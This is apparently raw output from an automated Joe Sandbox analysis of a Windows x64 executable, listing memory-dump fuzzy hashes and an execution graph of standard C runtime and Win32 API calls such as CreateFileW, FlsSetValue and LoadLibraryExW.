                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80a9c34be6bd484eb8f9d6cccda0cea37a0728b426d6fbaeaf018a06f83407a9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC41487280DA8A4FEB55EF68C8555E87BE4FF95300B2901FBE44AC75D2DE25AC01C780
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1525512972.00007FFB4AFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AFF0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffb4aff0000_file.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 82bdfc3681796d3f9e02e49305dfa1aff2c903bb2c9607f6acec349b544310d4
                                                                                                                                                                                                                                • Instruction ID: 4211f00c562855b87cf7d2690e9be2375d518e75c456ab6ea7ea4a82713eb91d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 82bdfc3681796d3f9e02e49305dfa1aff2c903bb2c9607f6acec349b544310d4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C0E01A31A056298EDF61EB18DC81BD9B7B1FB84300F0041E6D44DE3241CB306A84CF82
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1525129112.00007FFB4AF20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffb4af20000_file.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: da643b6c6f6cfd73923cca79edbf8bd96a3cae8fa2359edc30fd6e9deffd5412
                                                                                                                                                                                                                                • Instruction ID: 39f3cf092cde581ffb021d6a814d33413d74958414d453d2dda7974fc0378384
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: da643b6c6f6cfd73923cca79edbf8bd96a3cae8fa2359edc30fd6e9deffd5412
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6551157250D3D50FD31EAA789C564A17FE5DB8322171A82FFD4C6CB1E7E419680B83A1

                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                Execution Coverage:8.9%
                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                Signature Coverage:1.5%
                                                                                                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                                                                                                Total number of Limit Nodes:44
                                                                                                                                                                                                                                execution_graph 15900 7ff6aae35628 15901 7ff6aae3565f 15900->15901 15902 7ff6aae35642 15900->15902 15901->15902 15904 7ff6aae35672 CreateFileW 15901->15904 15951 7ff6aae34ee8 15902->15951 15906 7ff6aae356a6 15904->15906 15907 7ff6aae356dc 15904->15907 15925 7ff6aae3577c GetFileType 15906->15925 15960 7ff6aae35c04 15907->15960 15914 7ff6aae35710 15986 7ff6aae359c4 15914->15986 15915 7ff6aae356e5 15981 7ff6aae34e7c 15915->15981 15917 7ff6aae356bb CloseHandle 15920 7ff6aae3565a 15917->15920 15918 7ff6aae356d1 CloseHandle 15918->15920 15924 7ff6aae356ef 15924->15920 15926 7ff6aae35887 15925->15926 15927 7ff6aae357ca 15925->15927 15929 7ff6aae358b1 15926->15929 15930 7ff6aae3588f 15926->15930 15928 7ff6aae357f6 GetFileInformationByHandle 15927->15928 15932 7ff6aae35b00 21 API calls 15927->15932 15933 7ff6aae3581f 15928->15933 15934 7ff6aae358a2 GetLastError 15928->15934 15931 7ff6aae358d4 PeekNamedPipe 15929->15931 15936 7ff6aae35872 15929->15936 15930->15934 15935 7ff6aae35893 15930->15935 15931->15936 15937 7ff6aae357e4 15932->15937 15938 7ff6aae359c4 51 API calls 15933->15938 15940 7ff6aae34e7c _fread_nolock 11 API calls 15934->15940 15939 7ff6aae34f08 _get_daylight 11 API calls 15935->15939 16010 7ff6aae2c550 15936->16010 15937->15928 15937->15936 15942 7ff6aae3582a 15938->15942 15939->15936 15940->15936 16003 7ff6aae35924 15942->16003 15946 7ff6aae35924 10 API calls 15947 7ff6aae35849 15946->15947 15948 7ff6aae35924 10 API calls 15947->15948 15949 7ff6aae3585a 15948->15949 15949->15936 15950 7ff6aae34f08 _get_daylight 11 API calls 15949->15950 15950->15936 16024 7ff6aae3b2c8 GetLastError 15951->16024 15953 7ff6aae34ef1 15954 7ff6aae34f08 15953->15954 15955 7ff6aae3b2c8 _get_daylight 11 API calls 15954->15955 15956 7ff6aae34f11 15955->15956 15957 7ff6aae3a8e0 15956->15957 16082 7ff6aae3a778 15957->16082 15959 7ff6aae3a8f9 15959->15920 15961 7ff6aae35c3a 15960->15961 15962 7ff6aae34f08 _get_daylight 11 API calls 15961->15962 15980 7ff6aae35cd2 __vcrt_freefls 15961->15980 15964 7ff6aae35c4c 15962->15964 15963 7ff6aae2c550 _log10_special 8 API calls 15965 7ff6aae356e1 15963->15965 15966 7ff6aae34f08 _get_daylight 11 API calls 15964->15966 15965->15914 15965->15915 15967 7ff6aae35c54 15966->15967 16134 7ff6aae37e08 15967->16134 15969 7ff6aae35c69 15970 7ff6aae35c7b 15969->15970 15971 7ff6aae35c71 15969->15971 15973 7ff6aae34f08 _get_daylight 11 API calls 15970->15973 15972 7ff6aae34f08 _get_daylight 11 API calls 15971->15972 15977 7ff6aae35c76 15972->15977 15974 7ff6aae35c80 15973->15974 15975 7ff6aae34f08 _get_daylight 11 API calls 15974->15975 15974->15980 15976 7ff6aae35c8a 15975->15976 15978 7ff6aae37e08 45 API calls 15976->15978 15979 7ff6aae35cc4 GetDriveTypeW 15977->15979 15977->15980 15978->15977 15979->15980 15980->15963 15982 7ff6aae3b2c8 _get_daylight 11 API calls 15981->15982 15983 7ff6aae34e89 __free_lconv_mon 15982->15983 15984 7ff6aae3b2c8 _get_daylight 11 API calls 15983->15984 15985 7ff6aae34eab 15984->15985 15985->15924 15988 7ff6aae359ec 15986->15988 15987 7ff6aae3571d 15996 7ff6aae35b00 15987->15996 15988->15987 16228 7ff6aae3f724 15988->16228 15990 7ff6aae35a80 15990->15987 15991 7ff6aae3f724 51 API calls 15990->15991 15992 7ff6aae35a93 15991->15992 15992->15987 15993 7ff6aae3f724 51 API calls 15992->15993 15994 7ff6aae35aa6 15993->15994 15994->15987 15995 7ff6aae3f724 51 API calls 15994->15995 15995->15987 15997 7ff6aae35b1a 15996->15997 15998 7ff6aae35b51 15997->15998 15999 7ff6aae35b2a 15997->15999 16000 7ff6aae3f5b8 21 API calls 15998->16000 16001 7ff6aae34e7c _fread_nolock 11 API calls 15999->16001 16002 7ff6aae35b3a 15999->16002 16000->16002 16001->16002 16002->15924 16004 7ff6aae3594d FileTimeToSystemTime 16003->16004 16005 7ff6aae35940 16003->16005 16006 7ff6aae35961 SystemTimeToTzSpecificLocalTime 16004->16006 16007 7ff6aae35948 16004->16007 16005->16004 16005->16007 16006->16007 16008 7ff6aae2c550 _log10_special 8 API calls 16007->16008 16009 7ff6aae35839 16008->16009 16009->15946 16011 7ff6aae2c559 16010->16011 16012 7ff6aae2c564 16011->16012 16013 7ff6aae2c8e0 IsProcessorFeaturePresent 16011->16013 16012->15917 16012->15918 16014 7ff6aae2c8f8 16013->16014 16019 7ff6aae2cad8 RtlCaptureContext 16014->16019 16020 7ff6aae2caf2 RtlLookupFunctionEntry 16019->16020 16021 7ff6aae2cb08 RtlVirtualUnwind 16020->16021 16022 7ff6aae2c90b 16020->16022 16021->16020 16021->16022 16023 7ff6aae2c8a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16022->16023 16025 7ff6aae3b309 FlsSetValue 16024->16025 16027 7ff6aae3b2ec 16024->16027 16026 7ff6aae3b31b 16025->16026 16030 7ff6aae3b2f9 SetLastError 16025->16030 16041 7ff6aae3eb98 16026->16041 16027->16025 16027->16030 16030->15953 16032 7ff6aae3b348 FlsSetValue 16035 7ff6aae3b366 16032->16035 16036 7ff6aae3b354 FlsSetValue 16032->16036 16033 7ff6aae3b338 FlsSetValue 16034 7ff6aae3b341 16033->16034 16048 7ff6aae3a948 16034->16048 16054 7ff6aae3aef4 16035->16054 16036->16034 16046 7ff6aae3eba9 _get_daylight 16041->16046 16042 7ff6aae3ebde HeapAlloc 16044 7ff6aae3b32a 16042->16044 16042->16046 16043 7ff6aae3ebfa 16045 7ff6aae34f08 _get_daylight 10 API calls 16043->16045 16044->16032 16044->16033 16045->16044 16046->16042 16046->16043 16059 7ff6aae43590 16046->16059 16049 7ff6aae3a94d RtlFreeHeap 16048->16049 16050 7ff6aae3a97c 16048->16050 16049->16050 16051 7ff6aae3a968 GetLastError 16049->16051 16050->16030 16052 7ff6aae3a975 __free_lconv_mon 16051->16052 16053 7ff6aae34f08 _get_daylight 9 API calls 16052->16053 16053->16050 16068 7ff6aae3adcc 16054->16068 16062 7ff6aae435d0 16059->16062 16067 7ff6aae402d8 EnterCriticalSection 16062->16067 16080 7ff6aae402d8 EnterCriticalSection 16068->16080 16083 7ff6aae3a7a3 16082->16083 16086 7ff6aae3a814 16083->16086 16085 7ff6aae3a7ca 16085->15959 16096 7ff6aae3a55c 16086->16096 16089 7ff6aae3a84f 16089->16085 16097 7ff6aae3a578 GetLastError 16096->16097 16098 7ff6aae3a5b3 16096->16098 16099 7ff6aae3a588 16097->16099 16098->16089 16102 7ff6aae3a5c8 16098->16102 16109 7ff6aae3b390 16099->16109 16103 7ff6aae3a5fc 16102->16103 16104 7ff6aae3a5e4 GetLastError SetLastError 16102->16104 16103->16089 16105 7ff6aae3a900 IsProcessorFeaturePresent 16103->16105 16104->16103 16106 7ff6aae3a913 16105->16106 16126 7ff6aae3a614 16106->16126 16110 7ff6aae3b3ca FlsSetValue 16109->16110 16111 7ff6aae3b3af FlsGetValue 16109->16111 16113 7ff6aae3b3d7 16110->16113 16114 7ff6aae3a5a3 SetLastError 16110->16114 16112 7ff6aae3b3c4 16111->16112 16111->16114 16112->16110 16115 7ff6aae3eb98 _get_daylight 11 API calls 16113->16115 16114->16098 16116 7ff6aae3b3e6 16115->16116 16117 7ff6aae3b404 FlsSetValue 16116->16117 16118 7ff6aae3b3f4 FlsSetValue 16116->16118 16120 7ff6aae3b410 FlsSetValue 16117->16120 16121 7ff6aae3b422 16117->16121 16119 7ff6aae3b3fd 16118->16119 16122 7ff6aae3a948 __free_lconv_mon 11 API calls 16119->16122 16120->16119 16123 7ff6aae3aef4 _get_daylight 11 API calls 16121->16123 16122->16114 16124 7ff6aae3b42a 16123->16124 16125 7ff6aae3a948 __free_lconv_mon 11 API calls 16124->16125 16125->16114 16127 7ff6aae3a64e memcpy_s __FrameHandler3::FrameUnwindToEmptyState 16126->16127 16128 7ff6aae3a676 RtlCaptureContext RtlLookupFunctionEntry 16127->16128 16129 7ff6aae3a6e6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16128->16129 16130 7ff6aae3a6b0 RtlVirtualUnwind 16128->16130 16131 7ff6aae3a738 __FrameHandler3::FrameUnwindToEmptyState 16129->16131 16130->16129 16132 7ff6aae2c550 _log10_special 8 API calls 16131->16132 16133 7ff6aae3a757 GetCurrentProcess TerminateProcess 16132->16133 16135 7ff6aae37e24 16134->16135 16136 7ff6aae37e92 16134->16136 16135->16136 16137 7ff6aae37e29 16135->16137 16171 7ff6aae407c0 16136->16171 16139 7ff6aae37e41 16137->16139 16140 7ff6aae37e5e 16137->16140 16146 7ff6aae37bd8 GetFullPathNameW 16139->16146 16154 7ff6aae37c4c GetFullPathNameW 16140->16154 16145 7ff6aae37e56 __vcrt_freefls 16145->15969 16147 7ff6aae37bfe GetLastError 16146->16147 16150 7ff6aae37c14 16146->16150 16148 7ff6aae34e7c _fread_nolock 11 API calls 16147->16148 16151 7ff6aae37c0b 16148->16151 16149 7ff6aae37c10 16149->16145 16150->16149 16153 7ff6aae34f08 _get_daylight 11 API calls 16150->16153 16152 7ff6aae34f08 _get_daylight 11 API calls 16151->16152 16152->16149 16153->16149 16155 7ff6aae37c7f GetLastError 16154->16155 16157 7ff6aae37c95 __vcrt_freefls 16154->16157 16156 7ff6aae34e7c _fread_nolock 11 API calls 16155->16156 16158 7ff6aae37c8c 16156->16158 16159 7ff6aae37c91 16157->16159 16161 7ff6aae37cef GetFullPathNameW 16157->16161 16160 7ff6aae34f08 _get_daylight 11 API calls 16158->16160 16162 7ff6aae37d24 16159->16162 16160->16159 16161->16155 16161->16159 16166 7ff6aae37d98 memcpy_s 16162->16166 16167 7ff6aae37d4d memcpy_s 16162->16167 16163 7ff6aae37d81 16164 7ff6aae34f08 _get_daylight 11 API calls 16163->16164 16165 7ff6aae37d86 16164->16165 16169 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 16165->16169 16166->16145 16167->16163 16167->16166 16168 7ff6aae37dba 16167->16168 16168->16166 16170 7ff6aae34f08 _get_daylight 11 API calls 16168->16170 16169->16166 16170->16165 16174 7ff6aae405d0 16171->16174 16175 7ff6aae405fb 16174->16175 16176 7ff6aae40612 16174->16176 16177 7ff6aae34f08 _get_daylight 11 API calls 16175->16177 16178 7ff6aae40637 16176->16178 16179 7ff6aae40616 16176->16179 16181 7ff6aae40600 16177->16181 16212 7ff6aae3f5b8 16178->16212 16200 7ff6aae4073c 16179->16200 16185 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 16181->16185 16183 7ff6aae4063c 16188 7ff6aae406e1 16183->16188 16195 7ff6aae40663 16183->16195 16199 7ff6aae4060b __vcrt_freefls 16185->16199 16186 7ff6aae4061f 16187 7ff6aae34ee8 _fread_nolock 11 API calls 16186->16187 16189 7ff6aae40624 16187->16189 16188->16175 16190 7ff6aae406e9 16188->16190 16192 7ff6aae34f08 _get_daylight 11 API calls 16189->16192 16193 7ff6aae37bd8 13 API calls 16190->16193 16191 7ff6aae2c550 _log10_special 8 API calls 16194 7ff6aae40731 16191->16194 16192->16181 16193->16199 16194->16145 16196 7ff6aae37c4c 14 API calls 16195->16196 16197 7ff6aae406a7 16196->16197 16198 7ff6aae37d24 37 API calls 16197->16198 16197->16199 16198->16199 16199->16191 16201 7ff6aae40786 16200->16201 16202 7ff6aae40756 16200->16202 16203 7ff6aae40771 16201->16203 16204 7ff6aae40791 GetDriveTypeW 16201->16204 16205 7ff6aae34ee8 _fread_nolock 11 API calls 16202->16205 16207 7ff6aae2c550 _log10_special 8 API calls 16203->16207 16204->16203 16206 7ff6aae4075b 16205->16206 16208 7ff6aae34f08 _get_daylight 11 API calls 16206->16208 16210 7ff6aae4061b 16207->16210 16209 7ff6aae40766 16208->16209 16211 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 16209->16211 16210->16183 16210->16186 16211->16203 16226 7ff6aae4a4d0 16212->16226 16215 7ff6aae3f62c 16217 7ff6aae3eb98 _get_daylight 11 API calls 16215->16217 16216 7ff6aae3f605 16218 7ff6aae2c550 _log10_special 8 API calls 16216->16218 16219 7ff6aae3f63b 16217->16219 16220 7ff6aae3f699 16218->16220 16221 7ff6aae3f645 GetCurrentDirectoryW 16219->16221 16222 7ff6aae3f654 16219->16222 16220->16183 16221->16222 16224 7ff6aae3f659 16221->16224 16223 7ff6aae34f08 _get_daylight 11 API calls 16222->16223 16223->16224 16225 7ff6aae3a948 __free_lconv_mon 11 API calls 16224->16225 16225->16216 16227 7ff6aae3f5ee GetCurrentDirectoryW 16226->16227 16227->16215 16227->16216 16229 7ff6aae3f731 16228->16229 16230 7ff6aae3f755 16228->16230 16229->16230 16231 7ff6aae3f736 16229->16231 16233 7ff6aae3f78f 16230->16233 16234 7ff6aae3f7ae 16230->16234 16232 7ff6aae34f08 _get_daylight 11 API calls 16231->16232 16235 7ff6aae3f73b 16232->16235 16236 7ff6aae34f08 _get_daylight 11 API calls 16233->16236 16245 7ff6aae34f4c 16234->16245 16239 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 16235->16239 16237 7ff6aae3f794 16236->16237 16240 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 16237->16240 16241 7ff6aae3f746 16239->16241 16243 7ff6aae3f79f 16240->16243 16241->15990 16242 7ff6aae404dc 51 API calls 16244 7ff6aae3f7bb 16242->16244 16243->15990 16244->16242 16244->16243 16246 7ff6aae34f70 16245->16246 16252 7ff6aae34f6b 16245->16252 16246->16252 16253 7ff6aae3b150 GetLastError 16246->16253 16252->16244 16254 7ff6aae3b191 FlsSetValue 16253->16254 16255 7ff6aae3b174 FlsGetValue 16253->16255 16257 7ff6aae3b1a3 16254->16257 16272 7ff6aae3b181 16254->16272 16256 7ff6aae3b18b 16255->16256 16255->16272 16256->16254 16259 7ff6aae3eb98 _get_daylight 11 API calls 16257->16259 16258 7ff6aae3b1fd SetLastError 16260 7ff6aae3b21d 16258->16260 16261 7ff6aae34f8b 16258->16261 16262 7ff6aae3b1b2 16259->16262 16283 7ff6aae3a504 16260->16283 16275 7ff6aae3d984 16261->16275 16264 7ff6aae3b1d0 FlsSetValue 16262->16264 16265 7ff6aae3b1c0 FlsSetValue 16262->16265 16266 7ff6aae3b1dc FlsSetValue 16264->16266 16267 7ff6aae3b1ee 16264->16267 16269 7ff6aae3b1c9 16265->16269 16266->16269 16271 7ff6aae3aef4 _get_daylight 11 API calls 16267->16271 16270 7ff6aae3a948 __free_lconv_mon 11 API calls 16269->16270 16270->16272 16273 7ff6aae3b1f6 16271->16273 16272->16258 16274 7ff6aae3a948 __free_lconv_mon 11 API calls 16273->16274 16274->16258 16276 7ff6aae34fae 16275->16276 16277 7ff6aae3d999 16275->16277 16279 7ff6aae3d9f0 16276->16279 16277->16276 16327 7ff6aae43304 16277->16327 16280 7ff6aae3da18 16279->16280 16281 7ff6aae3da05 16279->16281 16280->16252 16281->16280 16340 7ff6aae42650 16281->16340 16292 7ff6aae43650 16283->16292 16318 7ff6aae43608 16292->16318 16323 7ff6aae402d8 EnterCriticalSection 16318->16323 16328 7ff6aae3b150 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16327->16328 16329 7ff6aae43313 16328->16329 16330 7ff6aae4335e 16329->16330 16339 7ff6aae402d8 EnterCriticalSection 16329->16339 16330->16276 16341 7ff6aae3b150 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16340->16341 16342 7ff6aae42659 16341->16342 20247 7ff6aae2acad 20249 7ff6aae2acb2 20247->20249 20248 7ff6aae2bd90 12 API calls 20252 7ff6aae2ab96 20248->20252 20254 7ff6aae2ae1a 20249->20254 20256 7ff6aae2a983 20249->20256 20257 7ff6aae2beb0 20249->20257 20251 7ff6aae2beb0 12 API calls 20253 7ff6aae2b128 20251->20253 20255 7ff6aae2beb0 12 API calls 20253->20255 20254->20251 20254->20256 20255->20256 20256->20248 20256->20252 20264 7ff6aae2bf00 20257->20264 20260 7ff6aae2bfb9 20261 7ff6aae2c550 _log10_special 8 API calls 20260->20261 20262 7ff6aae2c1f1 20261->20262 20262->20254 20263 7ff6aae2c445 20265 7ff6aae2c9b4 20263->20265 20264->20260 20264->20263 20268 7ff6aae2c9c8 IsProcessorFeaturePresent 20265->20268 20269 7ff6aae2c9df 20268->20269 20274 7ff6aae2ca68 RtlCaptureContext RtlLookupFunctionEntry 20269->20274 20275 7ff6aae2ca98 RtlVirtualUnwind 20274->20275 20276 7ff6aae2c9f3 20274->20276 20275->20276 20277 7ff6aae2c8a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 20276->20277 20278 7ff6aae416b0 20289 7ff6aae473e4 20278->20289 20290 7ff6aae473f1 20289->20290 20291 7ff6aae3a948 __free_lconv_mon 11 API calls 20290->20291 20293 7ff6aae4740d 20290->20293 20291->20290 20292 7ff6aae3a948 __free_lconv_mon 11 API calls 20292->20293 20293->20292 20294 7ff6aae416b9 20293->20294 20295 7ff6aae402d8 EnterCriticalSection 20294->20295 16343 7ff6aae2b81c 16344 7ff6aae2ab1a 16343->16344 16346 7ff6aae2ab96 16344->16346 16347 7ff6aae2bd90 16344->16347 16348 7ff6aae2bdb3 16347->16348 16349 7ff6aae2bdd1 memcpy_s 16347->16349 16351 7ff6aae3d5fc 16348->16351 16349->16346 16352 7ff6aae3d647 16351->16352 16356 7ff6aae3d60b _get_daylight 16351->16356 16353 7ff6aae34f08 _get_daylight 11 API calls 16352->16353 16355 7ff6aae3d645 16353->16355 16354 7ff6aae3d62e HeapAlloc 16354->16355 16354->16356 16355->16349 16356->16352 16356->16354 16357 7ff6aae43590 _get_daylight 2 API calls 16356->16357 16357->16356 18936 7ff6aae47c20 18939 7ff6aae425f0 18936->18939 18940 7ff6aae42642 18939->18940 18941 7ff6aae425fd 18939->18941 18945 7ff6aae3b224 18941->18945 18946 7ff6aae3b250 FlsSetValue 18945->18946 18947 7ff6aae3b235 FlsGetValue 18945->18947 18948 7ff6aae3b25d 18946->18948 18949 7ff6aae3b242 18946->18949 18947->18949 18950 7ff6aae3b24a 18947->18950 18951 7ff6aae3eb98 _get_daylight 11 API calls 18948->18951 18952 7ff6aae3b248 18949->18952 18953 7ff6aae3a504 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18949->18953 18950->18946 18955 7ff6aae3b26c 18951->18955 18965 7ff6aae422c4 18952->18965 18954 7ff6aae3b2c5 18953->18954 18956 7ff6aae3b28a FlsSetValue 18955->18956 18957 7ff6aae3b27a FlsSetValue 18955->18957 18959 7ff6aae3b2a8 18956->18959 18960 7ff6aae3b296 FlsSetValue 18956->18960 18958 7ff6aae3b283 18957->18958 18961 7ff6aae3a948 __free_lconv_mon 11 API calls 18958->18961 18962 7ff6aae3aef4 _get_daylight 11 API calls 18959->18962 18960->18958 18961->18949 18963 7ff6aae3b2b0 18962->18963 18964 7ff6aae3a948 __free_lconv_mon 11 API calls 18963->18964 18964->18952 18988 7ff6aae42534 18965->18988 18967 7ff6aae422f9 19003 7ff6aae41fc4 18967->19003 18970 7ff6aae42316 18970->18940 18971 7ff6aae3d5fc _fread_nolock 12 API calls 18972 7ff6aae42327 18971->18972 18973 7ff6aae4232f 18972->18973 18975 7ff6aae4233e 18972->18975 18974 7ff6aae3a948 __free_lconv_mon 11 API calls 18973->18974 18974->18970 18975->18975 19010 7ff6aae4266c 18975->19010 18978 7ff6aae4243a 18979 7ff6aae34f08 _get_daylight 11 API calls 18978->18979 18981 7ff6aae4243f 18979->18981 18980 7ff6aae42495 18984 7ff6aae424fc 18980->18984 19021 7ff6aae41df4 18980->19021 18982 7ff6aae3a948 __free_lconv_mon 11 API calls 18981->18982 18982->18970 18983 7ff6aae42454 18983->18980 18985 7ff6aae3a948 __free_lconv_mon 11 API calls 18983->18985 18987 7ff6aae3a948 __free_lconv_mon 11 API calls 18984->18987 18985->18980 18987->18970 18989 7ff6aae42557 18988->18989 18990 7ff6aae42561 18989->18990 19036 7ff6aae402d8 EnterCriticalSection 18989->19036 18992 7ff6aae425d3 18990->18992 18995 7ff6aae3a504 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18990->18995 18992->18967 18996 7ff6aae425eb 18995->18996 18999 7ff6aae42642 18996->18999 19000 7ff6aae3b224 50 API calls 18996->19000 18999->18967 19001 7ff6aae4262c 19000->19001 19002 7ff6aae422c4 65 API calls 19001->19002 19002->18999 19004 7ff6aae34f4c 45 API calls 19003->19004 19005 7ff6aae41fd8 19004->19005 19006 7ff6aae41ff6 19005->19006 19007 7ff6aae41fe4 GetOEMCP 19005->19007 19008 7ff6aae4200b 19006->19008 19009 7ff6aae41ffb GetACP 19006->19009 19007->19008 19008->18970 19008->18971 19009->19008 19011 7ff6aae41fc4 47 API calls 19010->19011 19012 7ff6aae42699 19011->19012 19013 7ff6aae427ef 19012->19013 19014 7ff6aae426d6 IsValidCodePage 19012->19014 19020 7ff6aae426f0 memcpy_s 19012->19020 19015 7ff6aae2c550 _log10_special 8 API calls 19013->19015 19014->19013 19017 7ff6aae426e7 19014->19017 19016 7ff6aae42431 19015->19016 19016->18978 19016->18983 19018 7ff6aae42716 GetCPInfo 19017->19018 19017->19020 19018->19013 19018->19020 19037 7ff6aae420dc 19020->19037 19102 7ff6aae402d8 EnterCriticalSection 19021->19102 19038 7ff6aae42119 GetCPInfo 19037->19038 19047 7ff6aae4220f 19037->19047 19042 7ff6aae4212c 19038->19042 19038->19047 19039 7ff6aae2c550 _log10_special 8 API calls 19041 7ff6aae422ae 19039->19041 19040 7ff6aae42e40 48 API calls 19043 7ff6aae421a3 19040->19043 19041->19013 19042->19040 19048 7ff6aae47b84 19043->19048 19046 7ff6aae47b84 54 API calls 19046->19047 19047->19039 19049 7ff6aae34f4c 45 API calls 19048->19049 19050 7ff6aae47ba9 19049->19050 19053 7ff6aae47850 19050->19053 19054 7ff6aae47891 19053->19054 19055 7ff6aae3f8a0 _fread_nolock MultiByteToWideChar 19054->19055 19058 7ff6aae478db 19055->19058 19056 7ff6aae47b59 19057 7ff6aae2c550 _log10_special 8 API calls 19056->19057 19059 7ff6aae421d6 19057->19059 19058->19056 19060 7ff6aae3d5fc _fread_nolock 12 API calls 19058->19060 19062 7ff6aae47913 19058->19062 19073 7ff6aae47a11 19058->19073 19059->19046 19060->19062 19061 7ff6aae3a948 __free_lconv_mon 11 API calls 19061->19056 19063 7ff6aae3f8a0 _fread_nolock MultiByteToWideChar 19062->19063 19062->19073 19064 7ff6aae47986 19063->19064 19064->19073 19084 7ff6aae3f0e4 19064->19084 19067 7ff6aae479d1 19070 7ff6aae3f0e4 __crtLCMapStringW 6 API calls 19067->19070 19067->19073 19068 7ff6aae47a22 19069 7ff6aae3d5fc _fread_nolock 12 API calls 19068->19069 19071 7ff6aae47af4 19068->19071 19072 7ff6aae47a40 19068->19072 19069->19072 19070->19073 19071->19073 19074 7ff6aae3a948 __free_lconv_mon 11 API calls 19071->19074 19072->19073 19075 7ff6aae3f0e4 __crtLCMapStringW 6 API calls 19072->19075 19073->19056 19073->19061 19074->19073 19076 7ff6aae47ac0 19075->19076 19076->19071 19077 7ff6aae47af6 19076->19077 19078 7ff6aae47ae0 19076->19078 19079 7ff6aae407e8 WideCharToMultiByte 19077->19079 19080 7ff6aae407e8 WideCharToMultiByte 19078->19080 19081 7ff6aae47aee 19079->19081 19080->19081 19081->19071 19082 7ff6aae47b0e 19081->19082 19082->19073 19083 7ff6aae3a948 __free_lconv_mon 11 API calls 19082->19083 19083->19073 19090 7ff6aae3ed10 19084->19090 19087 7ff6aae3f12a 19087->19067 19087->19068 19087->19073 19089 7ff6aae3f193 LCMapStringW 19089->19087 19096 7ff6aae3ed6d 19090->19096 19097 7ff6aae3ed68 __vcrt_FlsAlloc 19090->19097 19091 7ff6aae3ed9d LoadLibraryExW 19093 7ff6aae3ee72 19091->19093 19094 7ff6aae3edc2 GetLastError 19091->19094 19092 7ff6aae3ee92 GetProcAddress 19092->19096 19093->19092 19095 7ff6aae3ee89 FreeLibrary 19093->19095 19094->19097 19095->19092 19096->19087 19099 7ff6aae3f1d0 19096->19099 19097->19091 19097->19092 19097->19096 19098 7ff6aae3edfc LoadLibraryExW 19097->19098 19098->19093 19098->19097 19100 7ff6aae3ed10 __crtLCMapStringW 5 API calls 19099->19100 19101 7ff6aae3f1fe __crtLCMapStringW 19100->19101 19101->19089 19577 7ff6aae3c520 19588 7ff6aae402d8 EnterCriticalSection 19577->19588 19596 7ff6aae2b70c 19597 7ff6aae2ab13 19596->19597 19599 7ff6aae2ab96 19596->19599 19598 7ff6aae2bd90 12 API calls 19597->19598 19597->19599 19598->19599 18833 7ff6aae3f98c 18834 7ff6aae3fb7e 18833->18834 18836 7ff6aae3f9ce _isindst 18833->18836 18835 7ff6aae34f08 _get_daylight 11 API calls 18834->18835 18853 7ff6aae3fb6e 18835->18853 18836->18834 18839 7ff6aae3fa4e _isindst 18836->18839 18837 7ff6aae2c550 _log10_special 8 API calls 18838 7ff6aae3fb99 18837->18838 18854 7ff6aae46194 18839->18854 18844 7ff6aae3fbaa 18846 7ff6aae3a900 _isindst 17 API calls 18844->18846 18848 7ff6aae3fbbe 18846->18848 18851 7ff6aae3faab 18851->18853 18878 7ff6aae461d8 18851->18878 18853->18837 18855 7ff6aae3fa6c 18854->18855 18856 7ff6aae461a3 18854->18856 18860 7ff6aae45598 18855->18860 18885 7ff6aae402d8 EnterCriticalSection 18856->18885 18861 7ff6aae3fa81 18860->18861 18862 7ff6aae455a1 18860->18862 18861->18844 18866 7ff6aae455c8 18861->18866 18863 7ff6aae34f08 _get_daylight 11 API calls 18862->18863 18864 7ff6aae455a6 18863->18864 18865 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 18864->18865 18865->18861 18867 7ff6aae455d1 18866->18867 18871 7ff6aae3fa92 18866->18871 18868 7ff6aae34f08 _get_daylight 11 API calls 18867->18868 18869 7ff6aae455d6 18868->18869 18870 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 18869->18870 18870->18871 18871->18844 18872 7ff6aae455f8 18871->18872 18873 7ff6aae3faa3 18872->18873 18874 7ff6aae45601 18872->18874 18873->18844 18873->18851 18875 7ff6aae34f08 _get_daylight 11 API calls 18874->18875 18876 7ff6aae45606 18875->18876 18877 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 18876->18877 18877->18873 18886 7ff6aae402d8 EnterCriticalSection 18878->18886 19112 7ff6aae35410 19113 7ff6aae3541b 19112->19113 19121 7ff6aae3f2a4 19113->19121 19134 7ff6aae402d8 EnterCriticalSection 